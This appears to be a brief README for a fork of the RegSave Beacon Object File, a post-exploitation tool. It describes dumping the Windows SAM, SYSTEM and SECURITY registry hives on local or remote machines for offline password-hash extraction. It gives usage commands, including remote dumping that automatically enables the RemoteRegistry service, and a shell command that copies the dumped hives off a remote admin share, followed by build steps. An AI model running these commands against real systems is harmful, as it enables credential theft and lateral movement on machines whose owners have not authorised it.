A fork of RegSave BOF. Dump SAM/SYSTEM/SECURITY registry key hives on local or remote computer using RegConnectRegistryA and RegOpenKeyExA for offline parsing and hash extraction.
Dump registry key hives on local computer (admin elevation required)
RegSave --path [file path <optional>]
Dump registry key hives on remote computer (automatically enable service RemoteRegistry if disabled)
RegSave --pc remotePC --path [file path <optional>]
shell copy \\remoteSrv\C$\Windows\temp\HG029* .
cd SOURCE
make